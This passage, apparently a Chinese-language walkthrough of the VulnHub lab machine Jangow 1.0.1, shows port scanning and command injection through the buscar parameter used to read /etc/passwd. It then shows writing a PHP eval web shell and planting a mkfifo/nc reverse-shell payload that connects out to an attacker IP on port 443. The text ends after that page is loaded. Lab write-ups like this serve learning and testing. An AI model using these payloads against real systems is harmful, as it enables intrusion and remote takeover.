靶场地址：https://www.vulnhub.com/entry/jangow-101,754/

靶场IP：192.168.56.118

信息收集

使用御剑对目标进行扫描

该靶标开启了21、80两个端口，21端口运行服务为ftp，其版本为 vsftpd 3.0.3 ，80端口运行服务为Apache httpd 2.4.18，系统信息为 Linux 3.X|4.X

首先呢，我们访问80端口看有什么发现

可以看到这是一个目录遍历，有一个site目录，操作系统为Ubuntu，点击site目录

 

跳转到一个Web页面，页面右上角有三个模块，点击之后就是当前页面的下面部分，但是点击Buscar模块页面出现空白，但是出现如下链接

http://192.168.56.118/site/busque.php?buscar=

 

可以看到buscar未被赋值，猜测应该是代码执行或者是命令执行漏洞，那么就尝试一下输入命令看有无返回信息。

cat /etc/passwd

  我们看到这种一般是目录扫描，但是有可控的参数，那就试试

发现在点击Buscar时出现以下接口给上命令且执行成功

GetShell 

在此命令执行处拼接以下代码尝试直接GetShell

echo '<?php phpinfo();@eval($_POST[cmd]); ?>' > heihei.php

 

访问heihei.php文件

 

然后用蚁剑连接

测试连接，可以连接，那就继续

发现常规nc反弹shell失败，可能是nc不支持-e参数，使用mkfifo命令创建命名管道反弹shell，使用蚁剑在/var/www/html/site/下面新建shell.php文件。 

写入

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.233 443 >/tmp/f');?>

 

然后kali监听自己的443端口：nc -lvvp 443

为什么选择了443端口？因为其他的端口都反弹不了，可能是靶机做了限制，只有443端口是可行的。

浏览器去访问site下的shell.php文件

成功访问